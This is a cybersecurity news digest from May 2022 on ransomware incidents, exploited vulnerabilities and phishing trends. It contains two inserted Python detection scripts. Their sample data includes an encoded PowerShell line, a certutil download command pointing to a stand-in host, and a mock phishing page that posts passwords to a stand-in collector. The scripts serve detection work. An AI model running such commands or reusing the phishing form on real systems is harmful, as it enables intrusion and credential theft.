Tuesday, May 17, 2022 // (IG): BB //Weekly Sponsor: Unsafe Waters
PSA:
This service remains free because of our sponsors; without the funding they provide, it would be forced to move to a paid subscription model. Show them some love.
US Manufacturing Giant Parker Hit by Conti Ransomware Gang
FROM THE MEDIA: US manufacturing company Parker-Hannifin Corporation has announced a data breach exposing employees’ personal identifiable information (PII) after Conti ransomware actors published reportedly stolen data last month.
The firm, one of the largest companies in the world in motion control technologies, revealed in a press release that an unauthorized third party gained access to its IT systems between the dates of March 11 and March 14 2022.
An investigation conducted by the company determined that the unauthorized party accessed and likely acquired certain files on its IT systems, which included information related to current and former employees, their dependents and members of Parker’s Group Health Plans (including health plans sponsored by an entity acquired by Parker). This information may have included individuals’ names in combination with one or more of the following: Social Security numbers, dates of birth, addresses, driver’s license numbers, US passport numbers, financial account information (bank account and routing numbers), online account usernames/passwords, enrollment information (including health insurance plan member ID numbers) and dates of coverage.
READ THE STORY: InfoSecurity Magazine
Ransomware gang threatens to ‘overthrow’ new Costa Rica government, raises demand to $20 million
FROM THE MEDIA: The ransomware group behind an attack on several Costa Rican government ministries levied several violent warnings against the country this weekend, raising the ransom demand to $20 million and threatening to “overthrow” the government of new President Rodrigo Chaves.
In two messages posted to their leak site on Saturday, the Conti ransomware group – which has already leaked 97% of the 670 GB they stole from their attacks – claimed the U.S. government was “sacrificing” Costa Rica and that the country’s government should pay for the decryption keys to unlock their systems.
READ THE STORY: The Record
‘Multi-tasking doctor’ was mastermind behind ‘Thanos’ ransomware builder, DOJ says
FROM THE MEDIA: A French-Venezuelan physician created the “Thanos” ransomware builder and other tools used by cybercriminals, according to charges unveiled Monday by the Department of Justice.
The criminal complaint, unsealed in a Brooklyn federal court, said 55-year-old Moises Luis Zagala Gonzalez designed several tools to help those interested in creating and propagating ransomware, including software he named Thanos.
Thanos allows users to concoct their own, custom-made malware for locking up victims’ files and extorting money from them. Zagala provided extensive guidance on how people can launch ransomware affiliate programs and get the biggest ransom payments from victims, the DOJ said.
READ THE STORY: The Record
AGCO Provides Update on Recovery from Ransomware Cyber Attack
FROM THE MEDIA: AGCO, Your Agriculture Company (NYSE:AGCO), a worldwide manufacturer and distributor of agricultural equipment and infrastructure, announced today that the Company’s efforts to restore systems and business operations are continuing successfully following a ransomware cyber attack that was discovered on May 5, 2022. A majority of the affected production sites and parts operations resumed operational activities last week or today. The remainder of the sites are expected to begin operations during the balance of this week, such that all factories and parts operations are operating by the end of this week.
The Company also reported that there had been data exfiltration as a result of the ransomware cyber attack. While the Company does not have retail operations, and therefore no privacy-protected consumer data, the Company is still evaluating the scope and consequences of the data loss. Although damage from the ransomware cyber attack could require more in-depth, and lengthy, remediation and recovery than is currently expected, the Company currently expects to be able to mitigate the production loss from the ransomware cyber attack by increasing production over the remainder of 2022.
READ THE STORY: BusinessWire
Industrial Spy: Selling Stolen Data to Competitors
FROM THE MEDIA: Industrial Spy is the new marketplace where you can obtain the trade secrets of your competitors for millions of dollars or as little as two dollars. In this blog we take a look at this new service and discuss how it is changing the way cybercriminals do business.
Among cybercriminals, data-theft extortion has surged in popularity over the past few years, and it continues to gain momentum as organizations deploy more effective defenses against ransomware encryption. In fact, some cybercrime groups have publicly declared that they no longer conduct encryption-based ransomware attacks at all, a trend that the Babuk criminal gang started back in April 2021.
READ THE STORY: Security Boulevard
Microsoft Identifies Botnet Variant Targeting Windows and Linux Systems
FROM THE MEDIA: Microsoft has warned it has discovered a new variant of the Sysrv botnet, which deploys coin miners on both Windows and Linux systems.
In a thread posted on the Microsoft Security Intelligence (@MsftSecIntel) Twitter account, the tech giant revealed the new variant, which it has named Sysrv-K, is exploiting vulnerabilities in the Spring Framework and WordPress to deploy cryptocurrency miners on these systems.
Microsoft explained that the botnet “scans the internet to find web servers with various vulnerabilities to install itself.” These vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution.
Sysrv-K targets a mixture of old vulnerabilities, such as those found in WordPress plugins and newer ones like CVE-2022-22947. All of these have patches, according to Microsoft.
READ THE STORY: InfoSecurity Magazine
How cryptocurrencies enable attackers and defenders
FROM THE MEDIA: A rise in the popularity of cryptocurrency-based crime, coupled with a lack of regulation, has paved the way for cybercriminals to extort vast amounts of money from legitimate organizations.
These payouts have produced a sophistication around nonstate-sponsored threat actors, as they now have the funds to expand their operations and capabilities.
Security researchers estimated that the infamous Conti ransomware gang's revenue has surpassed $2 billion -- most of which involved cryptocurrencies. Its success has seen the group grow, so much that it essentially has an HR department to serve and train employees. It even pays employees and associates in digital currencies.
READ THE STORY: TechTarget
Crippling AI cyberattacks are inevitable: 4 ways companies can prepare
FROM THE MEDIA: When Eric Horvitz, Microsoft’s chief scientific officer, testified on May 3 before the U.S. Senate Armed Services Committee Subcommittee on Cybersecurity, he emphasized that organizations are certain to face new challenges as cybersecurity attacks increase in sophistication — including through the use of AI.
While AI is improving the ability to detect cybersecurity threats, he explained, threat actors are also upping the ante.
“While there is scarce information to date on the active use of AI in cyberattacks, it is widely accepted that AI technologies can be used to scale cyberattacks via various forms of probing and automation…referred to as offensive AI,” he said.
However, it’s not just the military that needs to stay ahead of threat actors using AI to scale up their attacks and evade detection. As enterprise companies battle a growing number of major security breaches, they need to prepare for increasingly sophisticated AI-driven cybercrimes, experts say.
READ THE STORY: VentureBeat
Critical bug in Zyxel firewalls, VPNs exploited in the wild
FROM THE MEDIA: A critical vulnerability in Zyxel firewalls and VPNs, which the vendor silently patched last month, is now being exploited in the wild by threat actors.
Last month, Jake Baines, lead security researcher at Rapid7, discovered the bug, tracked as CVE-2022-30525, that could allow for unauthenticated remote command injection through the administrative HTTP interface. He detailed the vulnerability, which was assigned a 9.8 CVSS score, in a blog post last week. One significant risk to enterprise networks is the potential for an attacker to establish a reverse shell, which can lead to remote access.
READ THE STORY: TechTarget
HHS Ransomware Report Details Revival of Dangerous LOTL Cyberattack
FROM THE MEDIA: On May 5, 2022, the U.S. Department of Health and Human Services (HHS) issued a report entitled “Ransomware Trends in the HPH Sector” (HHS Report) that reviewed key cybersecurity threats and trends affecting the U.S. healthcare sector.
The HHS Report also discusses the troubling return to prominence of “Living off the Land” (LOTL) cyberattacks by malicious actors. LOTL attacks first came into frequent use in approximately 2013; in them, threat actors use system tools supplied by the host operating system – tools normally used for legitimate purposes – to help launch ransomware and other malicious cyberattacks. LOTL attacks are considered “fileless” and, because they use tools from the host operating system, they are much more likely than a traditional malware attack to go undetected before doing substantial damage.
READ THE STORY: JDSupra
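The detection problem the HHS Report describes (legitimate host binaries reused to stage an attack) is easiest to see against process-creation telemetry. The following is an added example, not code from the HHS Report or the article: a small rule set run over a constructed key=value process log. The log format, the rule names, the binary lists and the four sample events are all my own assumptions for the illustration; the one encoded-command argument is a meaningless constructed string and the hostname uses the reserved .invalid TLD.

```python
"""Flag Living-off-the-Land (LOTL) activity in process-creation logs.

Added example; it is not code from the HHS report or the article. The
key=value log format, the rule names and the sample events are my own
constructions for this illustration.
"""
import re
from dataclasses import dataclass

# Built-in binaries that LOTL tradecraft commonly reuses (assumed, not exhaustive).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PROXY_EXEC = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"}

_URL = re.compile(r"https?://", re.I)
_ENC_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)
_CERTUTIL_DL = re.compile(r"-urlcache\b", re.I)
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key=value or key="value with spaces"


@dataclass
class Event:
    ts: str
    host: str
    parent: str   # basename of the parent image, lower-cased
    image: str    # basename of the created process image, lower-cased
    cmd: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> Event:
    """Parse one constructed 'key=value' process-creation line."""
    fields = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
              for m in _KV.finditer(line)}
    return Event(fields["ts"], fields["host"], _basename(fields["parent"]),
                 _basename(fields["image"]), fields.get("cmd", ""))


def evaluate(ev: Event) -> list:
    """Return the names of the LOTL rules the event matches (empty if none)."""
    hits = []
    # An Office document spawning a scripting host is the classic LOTL entry point.
    if ev.parent in OFFICE_PARENTS and ev.image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # Encoded PowerShell hides the command line from casual review.
    if ev.image == "powershell.exe" and _ENC_PS.search(ev.cmd):
        hits.append("encoded_powershell")
    # certutil's URL cache switch turns a certificate tool into a downloader.
    if ev.image == "certutil.exe" and _CERTUTIL_DL.search(ev.cmd):
        hits.append("certutil_download")
    # Any proxy-execution binary handed a URL deserves a look.
    if ev.image in PROXY_EXEC and _URL.search(ev.cmd):
        hits.append("lolbin_with_url")
    return hits


def scan(lines) -> list:
    """Run every rule over every line; return (ts, host, image, hits) per alert."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        hits = evaluate(ev)
        if hits:
            alerts.append((ev.ts, ev.host, ev.image, hits))
    return alerts


# Constructed sample log: two benign events, two LOTL-style events.
SAMPLE_LOG = r"""
ts=2022-05-16T09:12:03Z host=WS01 parent=C:\Windows\explorer.exe image=C:\Windows\System32\notepad.exe cmd="notepad.exe notes.txt"
ts=2022-05-16T09:14:41Z host=WS01 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -nop -w hidden -enc QQBBAEEA"
ts=2022-05-16T09:15:02Z host=SRV02 parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\certutil.exe cmd="certutil.exe -urlcache -f http://files.example.invalid/u.bin u.bin"
ts=2022-05-16T09:20:30Z host=WS03 parent=C:\Windows\explorer.exe image=C:\Windows\System32\rundll32.exe cmd="rundll32.exe shell32.dll,Control_RunDLL"
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(alert)
```

The fourth sample line is deliberately a legitimate rundll32 invocation: the rules key on parent-child relationships and arguments rather than on the binary name alone, which is what keeps LOTL detection from alerting on every use of a system tool.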
Russians allegedly storm Ukrainian ISP, blackmail it to switch to Russian networks
FROM THE MEDIA: Ukraine’s state communications agency said Friday that Russian forces had invaded a Kherson-based Internet company and disconnected all equipment, threatening to confiscate it if the company did not connect to Russian networks.
The incident is the latest in a string of attacks mounted against Ukrainian Internet providers and satellite broadband services.
“Free access to information is a major threat to the enemy in the occupied territories of our country,” a statement released by the State Service of Special Communications and Information Protection (SSSCIP) said. “As long as Ukrainians know about the true course of the war, Russian propaganda fails.”
READ THE STORY: CyberScoop
Ransomware gang that infiltrated some Costa Rican systems threatens to overthrow government
FROM THE MEDIA: A ransomware gang that infiltrated some Costa Rican government computer systems has upped its threat, saying its goal is now to overthrow the government.
Perhaps seizing on the fact that President Rodrigo Chaves had only been in office for a week, the Russian-speaking Conti gang tried to increase the pressure to pay a ransom by raising its demand to $20 million.
Chaves suggested Monday in a news conference that the attack was coming from inside as well as outside Costa Rica.
"We are at war and that's not an exaggeration," Chaves said. He said officials were battling a national terrorist group that had collaborators inside Costa Rica.
READ THE STORY: USATODAY
Engineering firm Parker discloses data breach after ransomware attack
FROM THE MEDIA: The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month.
Parker is an Ohio-based corporation specializing in advanced motion and control technologies, with a strong focus in aerospace hydraulic equipment. It has a revenue of $15.6 billion and employs over 58,000 people.
Parker-Hannifin says a security incident occurred between March 11 and March 14, 2022, and that it involved a third party who gained unauthorized access to Parker's computer systems.
READ THE STORY: BleepingComputer
US brings first-of-its-kind criminal charges of Bitcoin-based sanctions-busting
FROM THE MEDIA: US prosecutors have accused an American citizen of illegally funneling more than $10 million in Bitcoin into an economically sanctioned country.
It's said the resulting criminal charges of sanctions busting through the use of cryptocurrency are the first of their kind to be brought in the US.
Under the United States' International Emergency Economic Powers Act (IEEA), it is illegal for a citizen or institution within the US to transfer funds, directly or indirectly, to a sanctioned country, such as Iran, Cuba, North Korea, or Russia. If there is evidence the IEEA was willfully violated, a criminal case should follow. If an individual or financial exchange was unwittingly involved in evading sanctions, they may be subject to civil action.
READ THE STORY: The Register
HTML attachments remain popular among phishing actors in 2022
FROM THE MEDIA: HTML files remain one of the most popular attachments used in phishing attacks for the first four months of 2022, showing that the technique remains effective against antispam engines and works well on the victims themselves.
HTML (HyperText Markup Language) is a language that defines the meaning and structure of web content. HTML files are interactive content documents designed specifically for digital viewing within web browsers. In phishing emails, HTML files are commonly used to redirect users to malicious sites, download files, or to even display phishing forms locally within the browser.
READ THE STORY: BleepingComputer
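The article names three things an HTML attachment is typically used for (redirecting the victim, downloading a file, or rendering a phishing form locally), and each leaves a static trace a mail gateway can look for. The following is an added example, not code from the article or from any vendor: a stdlib-only triage routine that parses an attachment and scores those traces. The indicator names, the scoring thresholds and the two sample attachments are my own constructions; the hostnames use the reserved .invalid TLD.

```python
"""Static triage of an HTML e-mail attachment for phishing indicators.

Added example, not code from the article or from any vendor. The indicator
names, the scoring and the two sample attachments below are my own
constructions; the hostnames use the reserved .invalid TLD.
"""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Collect the parts of a document that the triage rules look at."""

    def __init__(self):
        super().__init__()
        self.forms = []         # action attribute of each <form>
        self.inputs = []        # type attribute of each <input>
        self.meta_refresh = []  # content of each <meta http-equiv="refresh">
        self.iframes = []       # src attribute of each <iframe>
        self.scripts = []       # body of each inline <script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append(a.get("action", ""))
        elif tag == "input":
            self.inputs.append(a.get("type", "text").lower())
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh.append(a.get("content", ""))
        elif tag == "iframe":
            self.iframes.append(a.get("src", ""))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1] += data


_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
_DECODER_CALLS = re.compile(r"\b(atob|unescape|eval|document\.write|fromCharCode)\s*\(")
_REDIRECT = re.compile(r"(window\.)?location(\.href)?\s*=")


def triage_html(doc: str) -> dict:
    """Score one attachment; returns {'score', 'findings', 'verdict'}."""
    p = _Collector()
    p.feed(doc)
    findings = []

    # 1. A credential form rendered locally and submitted to a remote host.
    has_password = "password" in p.inputs
    for action in p.forms:
        host = urlparse(action).netloc
        if has_password and host:
            findings.append(f"password form posts to external host {host}")
        elif has_password:
            findings.append("password form embedded in attachment")

    # 2. Client-side redirect away from the attachment.
    for content in p.meta_refresh:
        findings.append(f"meta refresh redirect: {content}")
    for body in p.scripts:
        if _REDIRECT.search(body):
            findings.append("script assigns window.location (JS redirect)")
        # 3. Encoded or obfuscated payload, typical of file-dropping attachments.
        if _DECODER_CALLS.search(body):
            findings.append("script uses decoder call (atob/unescape/eval/...)")
        if _B64_BLOB.search(body):
            findings.append("long base64 blob inside script")
    for src in p.iframes:
        if src.startswith(("data:", "javascript:")):
            findings.append(f"iframe with {src.split(':', 1)[0]}: URI")

    score = len(findings)
    verdict = "likely phishing" if score >= 2 else ("review" if score else "no indicators")
    return {"score": score, "findings": findings, "verdict": verdict}


# Constructed samples: a plain invoice and an attachment showing all three behaviours.
BENIGN_SAMPLE = """<html><body><h1>Invoice 1042</h1>
<table><tr><td>Total</td><td>120.00 EUR</td></tr></table></body></html>"""

_BLOB = base64.b64encode(b"x" * 200).decode()   # stands in for an encoded payload
SUSPICIOUS_SAMPLE = f"""<html><head>
<meta http-equiv="refresh" content="0;url=https://login.example.invalid/">
</head><body>
<form action="https://collect.example.invalid/post" method="post">
<input type="email" name="u"><input type="password" name="p">
</form>
<script>document.write(atob("{_BLOB}"));</script>
</body></html>"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        print(name, triage_html(doc))
```

Because the parser never executes the script, heavily obfuscated attachments will only trip the decoder-call and base64-blob rules; a gateway that wants the final redirect target has to detonate the file in a sandboxed browser instead.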
Apple 0-Day Security Warning For Mac, TV, Watch Users—Attacks May Be Underway
FROM THE MEDIA: Apple has issued an emergency security update for Mac, TV and Watch users which comes with a warning that the company is "aware of a report that this issue may have been actively exploited." The 0-day, or zero-day if you prefer, vulnerability has the potential to impact users of macOS Big Sur 11, tvOS 15 and watchOS 8.
The critical update, which has yet to be assigned a Common Vulnerabilities and Exposures (CVE) severity rating (it's not unusual for details to be 'reserved' relating to zero-day vulnerabilities while updates are distributed) has been given the reference CVE-2022-22675. What little detail is known currently is that the vulnerability could allow an app to execute arbitrary code and do so with kernel privileges. CVE-2022-22675 sits within the 'AppleAVD' kernel extension that enables audio and video decoding of High Efficiency Video Coding (HEVC), H.264, and VP9 formats.
READ THE STORY: Forbes
Dallas-based Christus Health experienced unauthorized activity on its computer network
FROM THE MEDIA: A Dallas-based Catholic, not-for-profit medical system has experienced a ransomware attack that it says did not affect any private patient health information.
Katy Kiser, director of external communications and social media at Christus Health, confirmed the unauthorized activity on the system’s network.
“Christus Health recently learned of unauthorized activity on its computer network,” Kiser said in a statement. “This was quickly identified and blocked by Christus Information Security. At this time, it appears that the incident is limited and didn’t impact any of Christus Health’s patient care or clinical operations. We are working with industry experts to investigate and address the issue. Christus values and is committed to the privacy and security of all those we are privileged to serve.”
AvosLocker, a new ransomware group, has claimed credit for the attack on the Catholic medical system, according to CyberScoop. It is the second health care system targeted by ransomware in the last two months. Michigan-based McKenzie Health System recently began notifying patients about an attack that included a breach of patient information.
READ THE STORY: Dallasnews
ConnectWise Control Was Used By Bad Actors: Blackpoint Cyber
FROM THE MEDIA: Security firm Blackpoint Cyber has issued a blog post warning that it has observed popular MSP remote control software from ConnectWise being deployed by bad actors in cyberattacks.
Use of the tool (ConnectWise Control, formerly known as ScreenConnect) by bad actors points to a growing trend of hackers using unaltered enterprise-level software in attacks for a fraction of the cost of developing new software, Blackpoint Cyber said in the post, which gave a detailed look at several cases it has been monitoring. The attackers used another RMM tool, Total Software Deployment, to launch the initial attack, said Blackpoint Cyber.
READ THE STORY: CRN
Hackers Can Abuse Low-Power Mode to Run Malware on Powered-Off iPhones
FROM THE MEDIA: Researchers from a university in Germany have analyzed the low-power mode (LPM) implementation on iPhones and found that it introduces potentially serious security risks, even allowing attackers to run malware on powered-off devices.
LPM is activated when the user switches off the iPhone or when the device shuts down due to low battery. While the device appears completely turned off, LPM ensures that certain features are still available, including the Find My service (for locating a device), digital car keys, payment apps, and travel cards.
While LPM has many benefits, it also introduces some security risks that cannot be ignored, particularly by journalists, activists and other individuals who are more likely to be targeted by well-funded threat actors.
An analysis conducted by a team of researchers from the Secure Mobile Networking Lab at TU Darmstadt showed that, on recent iPhone models, Bluetooth, NFC and Ultra-wideband (UWB) wireless communication systems remain active even after the device has been shut down. They conducted an analysis of the features introduced in iOS 15.
READ THE STORY: SecurityWeek
UK updates strategy to harden nuclear sector from cyberattacks
FROM THE MEDIA: The UK on Friday released new plans to address the cyber risks to the country’s civil nuclear sector as the government helps orchestrate a shift towards net-zero carbon emissions.
In October 2021, the UK government published a lengthy policy paper outlining the critical strategies needed to remove carbon from energy sources by 2050. According to the document, Secretary of State for the Department for Business, Energy & Industrial Strategy (BEIS) Hon Kwasi Kwarteng predicted that the net-zero plans will support 440,000 jobs by 2030. However, as described in a press release from BEIS on Friday, the growth of the civil nuclear sector puts it at greater risk of cyberattacks from state-backed threat actors.
READ THE STORY: The Record
Items of interest
Recent Exploits of a Windows Print Spooler Vulnerability Have Been Spotted in the Wild
FROM THE MEDIA: The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that a security defect in the Windows Print Spooler component, which was patched by Microsoft in February, is being actively abused in the wild. For that purpose, the agency has added the flaw to its Known Exploited Vulnerabilities Catalog, requiring FCEB agencies to fix the problem by May 10, 2022. The security flaw, identified as CVE-2022-22718, is one of four privilege escalation flaws in the Print Spooler that Microsoft fixed as part of its Patch Tuesday updates on February 8, 2022. It's worth mentioning that since the severe PrintNightmare remote code execution vulnerability was discovered last year, Microsoft has patched several Print Spooler problems, including 15 elevation-of-privilege vulnerabilities in April 2022.
The nature of the attacks and the identity of the threat actors who may be abusing the Print Spooler flaw have not been disclosed, in order to avoid further exploitation by other hacker teams. When the patches were released two months ago, Microsoft assigned the flaw the tag "exploitation more likely."
The catalog has also been updated with two additional security issues based on "evidence of active exploitation": CVE-2018-6882 (CVSS score 6.1), a cross-site scripting (XSS) vulnerability in Zimbra Collaboration Suite (ZCS), and CVE-2019-3568 (CVSS score 9.8), a buffer overflow vulnerability in WhatsApp's VoIP stack.
READ THE STORY: Enterprise Security
Last Line of Defense Reliability Through Inducing Cyber Threat Hunting (Video)
FROM THE MEDIA: Abdul Basit Ajmal received a bachelor's degree in computer science from COMSATS Islamabad in 2018 and a master's degree in information security in 2021. He is currently working as a cyber security specialist at dongamers.com and wemcss.com, and as a cyber security researcher on an HEC project at the R&D Cyber Security Lab, COMSATS Islamabad campus. He is a technical program committee member at IEEE HONET. His current research interests include securing industrial-grade systems, threat hunting, threat replication, adversary simulation, and risk assessment.
Deciphering Infostealers From Static Analysis to Automated IOC Extraction (Video)
FROM THE MEDIA: Ms. Sadia Bashir works as a Sr. Malware Researcher. She holds an MS (Computer & Communication Security) from SEECS, NUST Islamabad, and has worked across multiple computer science disciplines, including software-defined networks and cyber security. Before joining Ebryx, she held positions as Software Engineer (Python, C/C++) and Research Assistant in these domains. With malware analysis as her core skill, she enjoys hunting and reverse engineering malware with analysis automation.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com